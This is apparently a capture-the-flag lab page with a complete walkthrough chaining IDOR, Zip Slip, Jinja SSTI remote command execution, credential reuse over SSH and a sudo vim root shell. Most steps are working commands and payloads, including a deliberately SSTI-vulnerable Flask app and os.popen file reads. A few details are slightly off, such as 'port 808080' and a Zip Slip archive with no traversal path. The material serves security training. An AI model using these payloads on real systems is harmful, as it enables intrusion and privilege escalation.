Avatar

Labs / Broken Chain

  • Hard
  • Released 01 Apr 2025

🔗 Can you break through this chain of security controls?

A sophisticated web application environment hosts multiple interconnected services with layered security mechanisms. Each security control presents a unique challenge, but when properly chained together, even the most robust defenses can be systematically compromised. 🎯 Time to demonstrate advanced web application penetration testing skills!

2
Flags
60
Points
Hard
Solution Available
Free Access
Start Lab Environment

Launch your dedicated AWS machine to begin hacking

~1-2 min setup
AWS dedicated
Private instance
Industry standard
Hard

🔗 Broken Chain - Complete IDOR + Zip Slip + SSTI Solution

Objective: This machine covers IDOR + Zip Slip vulnerability as initial foothold, then port forwarding leads to a backup feature leading to credentials exposure via which we will use SSH as sudo to get root.
🔍 Step 1: Network Reconnaissance

Begin with port scanning to identify running services:

# Port scan reveals SSH and web application
nmap -Pn -sC -sV -p-

# Expected services:
# 22/tcp - SSH
# 8080/tcp - Blog Web Application

Port 8080 hosts the main web service running a blog application.

🔍 Step 2: Blog Application Analysis and IDOR Exploitation

Explore the blog website and exploit IDOR vulnerability:

# Visit the blog application and register
curl http://:8080

# Register a new account
curl -X POST http://:8080/register -d "username=testuser&password=testpass"

# Notice blog IDs start from 2, test for IDOR
curl http://:8080/blog/1
curl http://:8080/blog/2

# Access restricted blog post with ID 1 reveals developer credentials

IDOR vulnerability allows access to restricted blog posts containing sensitive developer credentials.

🔍 Step 3: Administrative Access and Directory Discovery

Use discovered credentials and perform directory enumeration:

# Login with discovered credentials
curl -X POST http://:8080/login -d "username=developer&password=found_password"

# New upload feature appears after login
# Directory enumeration to find hidden endpoints
gobuster dir -u http://:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

# Discover /administrators endpoint

After login, an upload feature appears. Gobuster reveals the hidden /administrators directory with additional upload functionality.

🔍 Step 4: Zip Slip Vulnerability Exploitation

Exploit Zip Slip vulnerability to replace the main application file:

# Create malicious Flask app with SSTI vulnerability
cat > app.py << 'EOF'
from flask import Flask, request, render_template_string
app = Flask(__name__)

@app.route("/")
def home():
    user_input = request.args.get("name", "Guest")
    return render_template_string(f"<h1>Welcome {user_input}</h1>")

if __name__ == "__main__":
    app.run(debug=True)
EOF

# Create zip file and upload to replace original app.py
zip malicious.zip app.py
curl -X POST -F "file=@malicious.zip" http://:8080/administrators/upload

Zip Slip vulnerability allows overwriting the original app.py with a malicious version containing SSTI.

🔍 Step 5: Server-Side Template Injection (SSTI)

Exploit SSTI vulnerability for remote command execution:

# Test SSTI payload for command execution
curl "http://:8080/?name={{config.__class__.__init__.__globals__['os'].popen('ls').read()}}"

# Execute commands to explore the system
curl "http://:8080/?name={{config.__class__.__init__.__globals__['os'].popen('ls /home').read()}}"

# Read user flag and note
curl "http://:8080/?name={{config.__class__.__init__.__globals__['os'].popen('cat /home/ctf/flag-user.txt').read()}}"
curl "http://:8080/?name={{config.__class__.__init__.__globals__['os'].popen('cat /home/ctf/note.txt').read()}}"

SSTI provides remote command execution. The user flag is located in /home/ctf/flag-user.txt and credentials are found in note.txt.

🔍 Step 6: SSH Access and Internal Port Discovery

Use discovered credentials for SSH access and internal reconnaissance:

# SSH login as ctf user
ssh ctf@
# Password from note.txt (also contains backup code)

# Discover internal services
netstat -a
# Reveals uncommon port 45678 running internally

SSH access as ctf user reveals an internal service running on port 45678.

🔍 Step 7: Internal Backup Service Enumeration

Enumerate the internal backup service on port 45678:

# Access internal service locally
curl http://:45678

# Directory enumeration on internal service
gobuster dir -u http://:45678 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

# Discover 2 useful endpoints: /backup and /controlpanel

Internal service provides a backup system with 2 useful endpoints. The /backup endpoint is code protected.

🔍 Step 8: Backup Service Exploitation

Use backup code from note.txt to access backup functionality:

# Access backup service with backup code from note.txt
curl -X POST http://:45678/backup -d "code=backup_code_from_note&path=/home/manager"

# Use control panel to view backed up files
curl http://:45678/controlpanel

# Navigate through backup files to find credentials
# Discover manager account credentials in backup.txt

The backup service requires a backup code and allows accessing manager's files, revealing additional credentials in backup.txt.

🔍 Step 9: Privilege Escalation to Manager

Use discovered manager credentials for lateral movement:

# Switch to manager user
su manager
# Password found in backup.txt

# Check sudo privileges
sudo -l
# Reveals: (ALL) NOPASSWD: /usr/bin/vim

The credentials belong to the manager account, which has sudo privileges to run vim without password.

🔍 Step 10: Root Privilege Escalation via Vim

Exploit sudo vim privileges to gain root access:

# Exploit vim sudo privileges for root shell
sudo vim -c ':!/bin/sh'

# Alternative method
sudo vim
# Then in vim: :!/bin/sh

# Retrieve root flag
cat /root/flag-root.txt

Vim with sudo privileges provides direct path to root shell execution. Root flag is located in /root/flag-root.txt.

🔍 Step 11: Attack Chain Summary

The complete attack chain involves:

  1. Port Scanning: Identify web service on port 808080
  2. IDOR Exploitation: Access restricted blog posts to find developer credentials
  3. Directory Enumeration: Discover hidden /administrators endpoint
  4. Zip Slip Attack: Replace app.py with malicious Flask application
  5. SSTI Exploitation: Execute commands through template injection
  6. Credential Discovery: Find backup code and SSH credentials in note.txt
  7. SSH Access: Login as ctf user for internal access
  8. Port Discovery: Identify internal backup service on port 45678
  9. Backup Exploitation: Use backup service to access manager files
  10. Lateral Movement: Switch to manager user with discovered credentials
  11. Privilege Escalation: Exploit sudo vim to gain root access
Key Vulnerabilities: IDOR for credential discovery, Zip Slip for code replacement, SSTI for RCE, and sudo vim for privilege escalation.
Real-World Application: This challenge demonstrates a realistic attack chain combining web application vulnerabilities (IDOR, Zip Slip, SSTI) with internal service exploitation and privilege escalation techniques commonly found in enterprise environments.